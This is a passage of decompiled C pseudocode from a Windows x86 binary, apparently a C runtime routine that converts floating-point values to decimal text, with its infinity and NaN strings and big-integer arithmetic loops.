				signed int _t1080;
				signed int _t1081;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1093;
				signed int _t1097;
				signed int _t1098;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				signed int _t1105;
				signed int _t1106;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				unsigned int _t1114;
				void* _t1117;
				intOrPtr _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int* _t1126;
				void* _t1130;
				void* _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				signed int _t1146;
				signed int _t1149;
				char _t1154;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1162;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				unsigned int _t1173;
				void* _t1177;
				void* _t1178;
				unsigned int _t1179;
				signed int _t1184;
				signed int _t1185;
				signed int _t1187;
				signed int _t1188;
				intOrPtr* _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1197;
				signed int _t1199;
				signed int _t1200;
				void* _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				void* _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int* _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				intOrPtr* _t1221;
				intOrPtr* _t1222;
				signed int _t1224;
				signed int _t1226;
				signed int _t1229;
				signed int _t1235;
				signed int _t1239;
				signed int _t1240;
				signed int _t1245;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1267;
				signed int _t1269;
				signed int _t1271;
				signed int _t1273;
				signed int _t1276;
				signed int _t1278;
				signed int* _t1279;
				signed int* _t1282;
				signed int _t1291;

				_t1145 = __edx;
				_t1276 = _t1278;
				_t1279 = _t1278 - 0x964;
				_t743 =  *0xa3e668; // 0xcba178b4
				_v8 = _t743 ^ _t1276;
				_t1058 = _a20;
				_push(__esi);
				_push(__edi);
				_t1190 = _a16;
				_v1924 = _t1190;
				_v1920 = _t1058;
				E00A2CE86( &_v1944, __eflags);
				_t1239 = _a8;
				_t748 = 0x2d;
				if((_t1239 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1190 = _t748;
				 *((intOrPtr*)(_t1190 + 8)) = _t1058;
				_t1191 = _a4;
				if((_t1239 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00A29464( &_a4);
					_pop(_t1073);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1073 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t778 = _t754 - 1;
						__eflags = _t778;
						if(_t778 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t779 = _t778 - 1;
							__eflags = _t779;
							if(_t779 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t779 == 1;
								if(_t779 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1191;
									_a8 = _t1239 & 0x7fffffff;
									_t1291 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1193 = _v1896;
									_v1916 = _a12 + 1;
									_t1080 = _t1193 >> 0x14;
									_t785 = _t1080 & 0x000007ff;
									__eflags = _t785;
									if(_t785 != 0) {
										_t1146 = 0;
										_t785 = 0;
										__eflags = 0;
									} else {
										_t1146 = 1;
									}
									_t1194 = _t1193 & 0x000fffff;
									_t1061 = _v1900 + _t785;
									asm("adc edi, esi");
									__eflags = _t1146;
									_t1081 = _t1080 & 0x000007ff;
									_t1245 = _t1081 - 0x434 + (0 | _t1146 != 0x00000000) + 1;
									_v1872 = _t1245;
									E00A2EED0(_t1081, _t1291);
									_push(_t1081);
									_push(_t1081);
									 *_t1279 = _t1291;
									_t791 = E00A31D30(E00A2EFE0(_t1194, _t1245), _t1291);
									_v1904 = _t791;
									__eflags = _t791 - 0x7fffffff;
									if(_t791 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t791 - 0x80000000;
										if(_t791 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1061;
									__eflags = _t1194;
									_v464 = _t1194;
									_t1064 = (0 | _t1194 != 0x00000000) + 1;
									_v472 = _t1064;
									__eflags = _t1245;
									if(_t1245 < 0) {
										__eflags = _t1245 - 0xfffffc02;
										if(_t1245 == 0xfffffc02) {
											L101:
											_t793 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1084 = 0;
												__eflags = 0;
											} else {
												_t1084 = _t793 + 1;
											}
											_t794 = 0x20;
											_t795 = _t794 - _t1084;
											__eflags = _t795 - 1;
											_t796 = _t795 & 0xffffff00 | _t795 - 0x00000001 > 0x00000000;
											__eflags = _t1064 - 0x73;
											_v1865 = _t796;
											_t1085 = _t1084 & 0xffffff00 | _t1064 - 0x00000073 > 0x00000000;
											__eflags = _t1064 - 0x73;
											if(_t1064 != 0x73) {
												L107:
												_t797 = 0;
												__eflags = 0;
											} else {
												__eflags = _t796;
												if(_t796 == 0) {
													goto L107;
												} else {
													_t797 = 1;
												}
											}
											__eflags = _t1085;
											if(_t1085 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00A2B851( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t797;
												if(_t797 != 0) {
													goto L126;
												} else {
													_t1112 = 0x72;
													__eflags = _t1064 - _t1112;
													if(_t1064 < _t1112) {
														_t1112 = _t1064;
													}
													__eflags = _t1112 - 0xffffffff;
													if(_t1112 != 0xffffffff) {
														_t1263 = _t1112;
														_t1221 =  &_v468 + _t1112 * 4;
														_v1880 = _t1221;
														while(1) {
															__eflags = _t1263 - _t1064;
															if(_t1263 >= _t1064) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1221;
															}
															_t210 = _t1263 - 1; // 0x70
															__eflags = _t210 - _t1064;
															if(_t210 >= _t1064) {
																_t1173 = 0;
																__eflags = 0;
															} else {
																_t1173 =  *(_t1221 - 4);
															}
															_t1221 = _t1221 - 4;
															_t975 = _v1880;
															_t1263 = _t1263 - 1;
															 *_t975 = _t1173 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t975 - 4;
															__eflags = _t1263 - 0xffffffff;
															if(_t1263 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														_t1245 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1112;
													} else {
														_t218 = _t1112 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1197 = 1 - _t1245;
											E00A1F5F0(_t1197,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1276 + 0xbad63d) = 1 << (_t1197 & 0x0000001f);
											_t806 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1113 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1113;
											__eflags = _t1064 - _t1113;
											if(_t1064 == _t1113) {
												_t1177 = 0;
												__eflags = 0;
												while(1) {
													_t977 =  *((intOrPtr*)(_t1276 + _t1177 - 0x570));
													__eflags = _t977 -  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0));
													if(_t977 !=  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0))) {
														goto L101;
													}
													_t1177 = _t1177 + 4;
													__eflags = _t1177 - 8;
													if(_t1177 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1178 = 0;
															__eflags = 0;
														} else {
															_t1178 = _t977 + 1;
														}
														_t978 = 0x20;
														_t1264 = _t1113;
														__eflags = _t978 - _t1178 - _t1113;
														_t980 =  &_v460;
														_v1880 = _t980;
														_t1222 = _t980;
														_t171 =  &_v1865;
														 *_t171 = _t978 - _t1178 - _t1113 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1264 - _t1064;
															if(_t1264 >= _t1064) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1222;
															}
															_t175 = _t1264 - 1; // 0x0
															__eflags = _t175 - _t1064;
															if(_t175 >= _t1064) {
																_t1179 = 0;
																__eflags = 0;
															} else {
																_t1179 =  *(_t1222 - 4);
															}
															_t1222 = _t1222 - 4;
															_t984 = _v1880;
															_t1264 = _t1264 - 1;
															 *_t984 = _t1179 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t984 - 4;
															__eflags = _t1264 - 0xffffffff;
															if(_t1264 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														__eflags = _v1865;
														_t1114 = _t1113 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1113;
														_t1224 = _t1114 >> 5;
														_v1884 = _t1114;
														_t1266 = _t1224 << 2;
														E00A1F5F0(_t1224,  &_v1396, 0, _t1266);
														 *(_t1276 + _t1266 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t806 = _t1224 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t806;
										_t1067 = 0x1cc;
										_v936 = _t806;
										__eflags = _t806 << 2;
										E00A2B851( &_v932, 0x1cc,  &_v1396, _t806 << 2);
										_t1282 =  &(_t1279[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1267 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1267;
										__eflags = _t1064 - _t1267;
										if(_t1064 != _t1267) {
											L53:
											_t995 = _v1872 + 1;
											_t996 = _t995 & 0x0000001f;
											_t1117 = 0x20;
											_v1876 = _t996;
											_t1226 = _t995 >> 5;
											_v1872 = _t1226;
											_v1908 = _t1117 - _t996;
											_t999 = E00A1EA70(1, _t1117 - _t996, 0);
											_t1119 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t1000 = _t999 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t1000;
											_v1912 =  !_t1000;
											if( *_t108 == 0) {
												_t1120 = 0;
												__eflags = 0;
											} else {
												_t1120 = _t1119 + 1;
											}
											_t1002 = 0x20;
											_t1003 = _t1002 - _t1120;
											_t1184 = _t1064 + _t1226;
											__eflags = _v1876 - _t1003;
											_v1892 = _t1184;
											_t1004 = _t1003 & 0xffffff00 | _v1876 - _t1003 > 0x00000000;
											__eflags = _t1184 - 0x73;
											_v1865 = _t1004;
											_t1121 = _t1120 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
											__eflags = _t1184 - 0x73;
											if(_t1184 != 0x73) {
												L59:
												_t1005 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1004;
												if(_t1004 == 0) {
													goto L59;
												} else {
													_t1005 = 1;
												}
											}
											__eflags = _t1121;
											if(_t1121 != 0) {
												L81:
												__eflags = 0;
												_t1067 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00A2B851( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t1005;
												if(_t1005 != 0) {
													goto L81;
												} else {
													_t1122 = 0x72;
													__eflags = _t1184 - _t1122;
													if(_t1184 >= _t1122) {
														_t1184 = _t1122;
														_v1892 = _t1122;
													}
													_t1015 = _t1184;
													_v1880 = _t1015;
													__eflags = _t1184 - 0xffffffff;
													if(_t1184 != 0xffffffff) {
														_t1185 = _v1872;
														_t1269 = _t1184 - _t1185;
														__eflags = _t1269;
														_t1126 =  &_v468 + _t1269 * 4;
														_v1888 = _t1126;
														while(1) {
															__eflags = _t1015 - _t1185;
															if(_t1015 < _t1185) {
																break;
															}
															__eflags = _t1269 - _t1064;
															if(_t1269 >= _t1064) {
																_t1229 = 0;
																__eflags = 0;
															} else {
																_t1229 =  *_t1126;
															}
															__eflags = _t1269 - 1 - _t1064;
															if(_t1269 - 1 >= _t1064) {
																_t1020 = 0;
																__eflags = 0;
															} else {
																_t1020 =  *(_t1126 - 4);
															}
															_t1023 = _v1880;
															_t1126 = _v1888 - 4;
															_v1888 = _t1126;
															 *(_t1276 + _t1023 * 4 - 0x1d0) = (_t1229 & _v1884) << _v1876 | (_t1020 & _v1912) >> _v1908;
															_t1015 = _t1023 - 1;
															_t1269 = _t1269 - 1;
															_v1880 = _t1015;
															__eflags = _t1015 - 0xffffffff;
															if(_t1015 != 0xffffffff) {
																_t1064 = _v472;
																continue;
															}
															break;
														}
														_t1184 = _v1892;
														_t1226 = _v1872;
														_t1267 = 2;
													}
													__eflags = _t1226;
													if(_t1226 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1226 << 2);
														_t1279 =  &(_t1279[3]);
													}
													__eflags = _v1865;
													_t1067 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1184;
													} else {
														_v472 = _t1184 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1267;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1130 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1276 + _t1130 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0));
												if( *((intOrPtr*)(_t1276 + _t1130 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0))) {
													goto L53;
												}
												_t1130 = _t1130 + 4;
												__eflags = _t1130 - 8;
												if(_t1130 != 8) {
													continue;
												} else {
													_t1026 = _v1872 + 2;
													_t1027 = _t1026 & 0x0000001f;
													_t1131 = 0x20;
													_t1132 = _t1131 - _t1027;
													_v1888 = _t1027;
													_t1271 = _t1026 >> 5;
													_v1876 = _t1271;
													_v1908 = _t1132;
													_t1030 = E00A1EA70(1, _t1132, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1031 = _t1030 - 1;
													__eflags = _t1031;
													asm("bsr ecx, edi");
													_v1884 = _t1031;
													_v1912 =  !_t1031;
													if(_t1031 == 0) {
														_t1133 = 0;
														__eflags = 0;
													} else {
														_t1133 = _t1132 + 1;
													}
													_t1033 = 0x20;
													_t1034 = _t1033 - _t1133;
													_t1187 = _t1271 + 2;
													__eflags = _v1888 - _t1034;
													_v1880 = _t1187;
													_t1035 = _t1034 & 0xffffff00 | _v1888 - _t1034 > 0x00000000;
													__eflags = _t1187 - 0x73;
													_v1865 = _t1035;
													_t1134 = _t1133 & 0xffffff00 | _t1187 - 0x00000073 > 0x00000000;
													__eflags = _t1187 - 0x73;
													if(_t1187 != 0x73) {
														L28:
														_t1036 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1035;
														if(_t1035 == 0) {
															goto L28;
														} else {
															_t1036 = 1;
														}
													}
													__eflags = _t1134;
													if(_t1134 != 0) {
														L50:
														__eflags = 0;
														_t1067 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00A2B851( &_v468, 0x1cc,  &_v1396, 0);
														_t1279 =  &(_t1279[4]);
													} else {
														__eflags = _t1036;
														if(_t1036 != 0) {
															goto L50;
														} else {
															_t1137 = 0x72;
															__eflags = _t1187 - _t1137;
															if(_t1187 >= _t1137) {
																_t1187 = _t1137;
																_v1880 = _t1137;
															}
															_t1138 = _t1187;
															_v1892 = _t1138;
															__eflags = _t1187 - 0xffffffff;
															if(_t1187 != 0xffffffff) {
																_t1188 = _v1876;
																_t1273 = _t1187 - _t1188;
																__eflags = _t1273;
																_t1046 =  &_v468 + _t1273 * 4;
																_v1872 = _t1046;
																while(1) {
																	__eflags = _t1138 - _t1188;
																	if(_t1138 < _t1188) {
																		break;
																	}
																	__eflags = _t1273 - _t1064;
																	if(_t1273 >= _t1064) {
																		_t1235 = 0;
																		__eflags = 0;
																	} else {
																		_t1235 =  *_t1046;
																	}
																	__eflags = _t1273 - 1 - _t1064;
																	if(_t1273 - 1 >= _t1064) {
																		_t1048 = 0;
																		__eflags = 0;
																	} else {
																		_t1048 =  *(_v1872 - 4);
																	}
																	_t1143 = _v1892;
																	 *(_t1276 + _t1143 * 4 - 0x1d0) = (_t1048 & _v1912) >> _v1908 | (_t1235 & _v1884) << _v1888;
																	_t1138 = _t1143 - 1;
																	_t1273 = _t1273 - 1;
																	_t1046 = _v1872 - 4;
																	_v1892 = _t1138;
																	_v1872 = _t1046;
																	__eflags = _t1138 - 0xffffffff;
																	if(_t1138 != 0xffffffff) {
																		_t1064 = _v472;
																		continue;
																	}
																	break;
																}
																_t1187 = _v1880;
																_t1271 = _v1876;
															}
															__eflags = _t1271;
															if(_t1271 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1271 << 2);
																_t1279 =  &(_t1279[3]);
															}
															__eflags = _v1865;
															_t1067 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1187;
															} else {
																_v472 = _t1187 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1041 = 4;
													__eflags = 1;
													_v1396 = _t1041;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1041);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1067);
										_push( &_v932);
										E00A2B851();
										_t1282 =  &(_t1279[4]);
									}
									_t811 = _v1904;
									_t1087 = 0xa;
									_v1912 = _t1087;
									__eflags = _t811;
									if(_t811 < 0) {
										_t812 =  ~_t811;
										_t813 = _t812 / _t1087;
										_v1880 = _t813;
										_t1088 = _t812 % _t1087;
										_v1884 = _t1088;
										__eflags = _t813;
										if(_t813 == 0) {
											L249:
											__eflags = _t1088;
											if(_t1088 != 0) {
												_t852 =  *(0xa37d8c + _t1088 * 4);
												_v1896 = _t852;
												__eflags = _t852;
												if(_t852 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t852 - 1;
													if(_t852 != 1) {
														_t1099 = _v472;
														__eflags = _t1099;
														if(_t1099 != 0) {
															_t1204 = 0;
															_t1253 = 0;
															__eflags = 0;
															do {
																_t1158 = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) >> 0x20;
																 *(_t1276 + _t1253 * 4 - 0x1d0) = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) + _t1204;
																_t852 = _v1896;
																asm("adc edx, 0x0");
																_t1253 = _t1253 + 1;
																_t1204 = _t1158;
																__eflags = _t1253 - _t1099;
															} while (_t1253 != _t1099);
															__eflags = _t1204;
															if(_t1204 != 0) {
																_t859 = _v472;
																__eflags = _t859 - 0x73;
																if(_t859 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1276 + _t859 * 4 - 0x1d0) = _t1204;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t813 - 0x26;
												if(_t813 > 0x26) {
													_t813 = 0x26;
												}
												_t1100 =  *(0xa37cf6 + _t813 * 4) & 0x000000ff;
												_v1872 = _t813;
												_v1400 = ( *(0xa37cf6 + _t813 * 4) & 0x000000ff) + ( *(0xa37cf7 + _t813 * 4) & 0x000000ff);
												E00A1F5F0(_t1100 << 2,  &_v1396, 0, _t1100 << 2);
												_t870 = E00A1F750( &(( &_v1396)[_t1100]), 0xa373f0 + ( *(0xa37cf4 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xa37cf7 + _t813 * 4) & 0x000000ff) << 2);
												_t1101 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1101;
												__eflags = _t1101 - 1;
												if(_t1101 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1101 - _v472;
														_t1207 =  &_v1396;
														_t871 = _t870 & 0xffffff00 | _t1101 - _v472 > 0x00000000;
														__eflags = _t871;
														if(_t871 != 0) {
															_t1159 =  &_v468;
														} else {
															_t1207 =  &_v468;
															_t1159 =  &_v1396;
														}
														_v1908 = _t1159;
														__eflags = _t871;
														if(_t871 == 0) {
															_t1101 = _v472;
														}
														_v1876 = _t1101;
														__eflags = _t871;
														if(_t871 != 0) {
															_v1892 = _v472;
														}
														_t1160 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1101;
														if(_t1101 == 0) {
															L243:
															_v472 = _t1160;
															_t873 = _t1160 << 2;
															__eflags = _t873;
															_push(_t873);
															_t874 =  &_v1860;
															goto L244;
														} else {
															_t1208 = _t1207 -  &_v1860;
															__eflags = _t1208;
															_v1928 = _t1208;
															do {
																_t881 =  *(_t1276 + _t1208 + _t1255 * 4 - 0x740);
																_v1896 = _t881;
																__eflags = _t881;
																if(_t881 != 0) {
																	_t882 = 0;
																	_t1209 = 0;
																	_t1102 = _t1255;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1102 - 0x73;
																		if(_t1102 == 0x73) {
																			goto L258;
																		} else {
																			_t1208 = _v1928;
																			_t1101 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1102 - 0x73;
																			if(_t1102 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1102 - _t1160;
																			if(_t1102 == _t1160) {
																				 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																				_t894 = _t882 + 1 + _t1255;
																				__eflags = _t894;
																				_v1864 = _t894;
																				_t882 = _v1888;
																			}
																			_t889 =  *(_v1908 + _t882 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t889 * _v1896 + _t1209;
																			asm("adc edx, 0x0");
																			_t882 = _v1888 + 1;
																			_t1102 = _t1102 + 1;
																			_v1888 = _t882;
																			_t1209 = _t889 * _v1896 >> 0x20;
																			_t1160 = _v1864;
																			__eflags = _t882 - _v1892;
																			if(_t882 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1209;
																				if(_t1209 == 0) {
																					goto L240;
																				}
																				__eflags = _t1102 - 0x73;
																				if(_t1102 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1102 - _t1160;
																					if(_t1102 == _t1160) {
																						_t558 = _t1276 + _t1102 * 4 - 0x740;
																						 *_t558 =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1102 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t887 = _t1209;
																					_t1209 = 0;
																					 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t887;
																					_t1160 = _v1864;
																					asm("adc edi, edi");
																					_t1102 = _t1102 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1255 - _t1160;
																	if(_t1255 == _t1160) {
																		 *(_t1276 + _t1255 * 4 - 0x740) =  *(_t1276 + _t1255 * 4 - 0x740) & _t881;
																		_t526 = _t1255 + 1; // 0x1
																		_t1160 = _t526;
																		_v1864 = _t1160;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1101;
															} while (_t1255 != _t1101);
															goto L243;
														}
													} else {
														_t1210 = _v468;
														_v472 = _t1101;
														E00A2B851( &_v468, _t1067,  &_v1396, _t1101 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1210;
														if(_t1210 == 0) {
															goto L203;
														} else {
															__eflags = _t1210 - 1;
															if(_t1210 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1103 = 0;
																	_v1896 = _v472;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t903 = _t1210;
																		_t1161 = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) >> 0x20;
																		 *(_t1276 + _t1256 * 4 - 0x1d0) = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) + _t1103;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1103 = _t1161;
																		__eflags = _t1256 - _v1896;
																	} while (_t1256 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1211 = _v1396;
													__eflags = _t1211;
													if(_t1211 != 0) {
														__eflags = _t1211 - 1;
														if(_t1211 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1104 = 0;
																_v1896 = _v472;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t908 = _t1211;
																	_t1162 = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
																	 *(_t1276 + _t1257 * 4 - 0x1d0) = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1104 = _t1162;
																	__eflags = _t1257 - _v1896;
																} while (_t1257 != _v1896);
																L208:
																__eflags = _t1103;
																if(_t1103 == 0) {
																	goto L245;
																} else {
																	_t906 = _v472;
																	__eflags = _t906 - 0x73;
																	if(_t906 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00A2B851( &_v468, _t1067,  &_v2404, 0);
																		_t1282 =  &(_t1282[4]);
																		_t877 = 0;
																	} else {
																		 *(_t1276 + _t906 * 4 - 0x1d0) = _t1103;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t874 =  &_v2404;
														L244:
														_push(_t874);
														_push(_t1067);
														_push( &_v468);
														E00A2B851();
														_t1282 =  &(_t1282[4]);
														L245:
														_t877 = 1;
													}
												}
												L246:
												__eflags = _t877;
												if(_t877 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t855 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t813 = _v1880 - _v1872;
												__eflags = _t813;
												_v1880 = _t813;
											} while (_t813 != 0);
											_t1088 = _v1884;
											goto L249;
										}
									} else {
										_t911 = _t811 / _t1087;
										_v1908 = _t911;
										_t1105 = _t811 % _t1087;
										_v1896 = _t1105;
										__eflags = _t911;
										if(_t911 == 0) {
											L184:
											__eflags = _t1105;
											if(_t1105 != 0) {
												_t1212 =  *(0xa37d8c + _t1105 * 4);
												__eflags = _t1212;
												if(_t1212 != 0) {
													__eflags = _t1212 - 1;
													if(_t1212 != 1) {
														_t912 = _v936;
														_v1896 = _t912;
														__eflags = _t912;
														if(_t912 != 0) {
															_t1258 = 0;
															_t1106 = 0;
															__eflags = 0;
															do {
																_t913 = _t1212;
																_t1166 = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) >> 0x20;
																 *(_t1276 + _t1106 * 4 - 0x3a0) = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) + _t1258;
																asm("adc edx, 0x0");
																_t1106 = _t1106 + 1;
																_t1258 = _t1166;
																__eflags = _t1106 - _v1896;
															} while (_t1106 != _v1896);
															__eflags = _t1258;
															if(_t1258 != 0) {
																_t916 = _v936;
																__eflags = _t916 - 0x73;
																if(_t916 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1276 + _t916 * 4 - 0x3a0) = _t1258;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t911 - 0x26;
												if(_t911 > 0x26) {
													_t911 = 0x26;
												}
												_t1107 =  *(0xa37cf6 + _t911 * 4) & 0x000000ff;
												_v1888 = _t911;
												_v1400 = ( *(0xa37cf6 + _t911 * 4) & 0x000000ff) + ( *(0xa37cf7 + _t911 * 4) & 0x000000ff);
												E00A1F5F0(_t1107 << 2,  &_v1396, 0, _t1107 << 2);
												_t929 = E00A1F750( &(( &_v1396)[_t1107]), 0xa373f0 + ( *(0xa37cf4 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xa37cf7 + _t911 * 4) & 0x000000ff) << 2);
												_t1108 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1108;
												__eflags = _t1108 - 1;
												if(_t1108 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1108 - _v936;
														_t1215 =  &_v1396;
														_t930 = _t929 & 0xffffff00 | _t1108 - _v936 > 0x00000000;
														__eflags = _t930;
														if(_t930 != 0) {
															_t1167 =  &_v932;
														} else {
															_t1215 =  &_v932;
